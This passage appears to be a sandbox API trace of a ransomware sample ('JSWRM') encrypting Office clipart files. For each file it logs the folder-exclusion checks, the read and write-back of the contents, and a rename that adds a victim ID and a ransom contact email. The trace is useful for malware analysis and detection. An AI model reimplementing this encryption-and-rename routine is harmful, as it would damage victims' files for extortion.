Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.165] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=38522) returned 1 [0098.165] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9670) returned 0x24d210 [0098.166] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9670, lpOverlapped=0x0) returned 1 [0098.169] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.170] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9670, lpOverlapped=0x0) returned 1 [0098.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.171] CloseHandle (hObject=0x314) returned 1 [0098.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0098.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0098.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0098.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0098.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0098.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0098.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.171] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0098.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0098.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.172] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02958_.WMF", cAlternateFileName="")) returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2=".") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="..") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="...") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="windows") returned -1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="recovery") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="perflogs") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="documents and settings") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="system volume information") returned -1 [0098.172] lstrcmpiW (lpString1="SO02958_.WMF", lpString2="msocache") returned 1 [0098.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0098.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02958_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02958_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02958_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0098.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02958_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02958_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02958_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0098.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.173] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8948) returned 1 [0098.173] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22f0) returned 0x24d210 [0098.174] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x22f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x22f0, lpOverlapped=0x0) returned 1 [0098.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.241] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x22f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x22f0, lpOverlapped=0x0) returned 1 [0098.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.241] CloseHandle (hObject=0x314) returned 1 [0098.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0098.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0098.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0098.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0098.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0098.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0098.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0098.243] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x107b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SPACE_01.MID", cAlternateFileName="")) returned 1 [0098.243] lstrcmpiW (lpString1="SPACE_01.MID", lpString2=".") returned 1 [0098.243] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="..") returned 1 [0098.243] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="...") returned 1 [0098.243] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="windows") returned -1 [0098.243] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="recovery") returned 1 [0098.243] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="perflogs") returned 1 [0098.244] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="documents and settings") returned 1 [0098.244] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0098.244] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="system volume information") returned -1 [0098.244] lstrcmpiW (lpString1="SPACE_01.MID", lpString2="msocache") returned 1 [0098.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0098.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPACE_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0098.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0098.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPACE_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0098.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4219) returned 1 [0098.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1070) returned 0x23fc98 [0098.245] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1070, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1070, lpOverlapped=0x0) returned 1 [0098.247] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.247] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1070, lpOverlapped=0x0) returned 1 [0098.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.247] CloseHandle (hObject=0x314) returned 1 [0098.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0098.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0098.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0098.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0098.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0098.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.247] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0098.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.248] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SPRNG_01.MID", cAlternateFileName="")) returned 1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2=".") returned 1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="..") returned 1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="...") returned 1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="windows") returned -1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="recovery") returned 1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="perflogs") returned 1 [0098.248] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="documents and settings") returned 1 [0098.249] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0098.249] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="system volume information") returned -1 [0098.249] lstrcmpiW (lpString1="SPRNG_01.MID", lpString2="msocache") returned 1 [0098.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0098.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRNG_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRNG_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPRNG_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0098.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0098.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRNG_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPRNG_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPRNG_01.MID", lpUsedDefaultChar=0x0) returned 12 [0098.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0098.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.250] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6700) returned 1 [0098.250] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a20) returned 0x205850 [0098.250] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a20, lpOverlapped=0x0) returned 1 [0098.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.252] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a20, lpOverlapped=0x0) returned 1 [0098.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.252] CloseHandle (hObject=0x314) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 